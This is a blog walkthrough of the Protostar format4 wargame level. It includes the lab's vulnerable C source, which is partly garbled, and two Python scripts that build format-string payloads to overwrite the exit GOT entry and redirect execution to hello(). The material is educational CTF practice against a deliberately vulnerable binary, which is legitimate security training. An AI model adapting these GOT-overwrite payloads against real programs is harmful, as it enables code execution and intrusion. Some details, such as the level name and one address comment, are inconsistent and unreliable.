Binary Exploitation Protostar Format4 - Walkthrough

Posted by Suraj Singh on May 10, 2018 · 4 mins read
Hello Guyz,

Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Format0 Level.

In this level, Our goal is to overwrite Return pointer Address And So, That In Future We can use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just need to prove that with this vulnerability we can overwrite the EIP register but here comes another difficulty of this level. As Already mentioned in the hint

We have to use Format String Vulnerability To Overwrite our Instruction Pointer Register.

After Searching, About this vulnerability, I found below-mentioned articles very useful. So, Use below mention links as the reference of format string vulnerability.

2. StackOverflow
3.  PDF

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
printf("code execution redirected! you win\n");

void vuln()
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);



int main(int argc, char **argv)


%p format4 looks at one method of redirecting execution in a process.


objdump -TR is your readers
This level is at /opt/protostar/bin/format4


import struct

# print | ./format4

# Number Of Bytes
p3 = "%33953x%4$n"
p3+= "%33616x%5$n"

# Want To Write 0x080484b4 Into Below Address [Printf GOT].
p1 = struct.pack("I", 0x08049724)
p2 = struct.pack("I", 0x08049726)
p2+= "%x%x"
print p1+p2+p3

Exploit (Alternate Way)

import struct

# print | ./format4
# =================================================
# Format4 [Fill in 4 Parts ]
# =================================================
# [Step One] Analyse Paddings
p1 = "aaaa"
p2 = "%x%x%x"
p3 = "%x"

#print p1+p2+p3

padding = 4

# [Step Two] Check Padding

# print p1+"%"+str(padding)+"$x"

# [Step Three] Install Our malicios address into the stack in 4 parts
# Findout Dynamic allocation address of exit command using objdump -TR format4
# 0x08049724

p = ''
p+= struct.pack("I", 0x08049724)
p+= struct.pack("I", 0x08049725)
p+= struct.pack("I", 0x08049726)
p+= struct.pack("I", 0x08049727)

# Need To fill 0x080484b4

p+= "%164x" # first padding
p+= "%4$n"
p+= "%208x" # Second padding
p+= "%5$n"
p+= "%128x" # third padding
p+= "%6$n"
p+= "%260x" # fourth padding
p+= "%7$n"

print p

For More Detailed Walk through Check Below Provided YouTube Video Playlist

Bitforestinfo YouTube Protostar CTF Playlist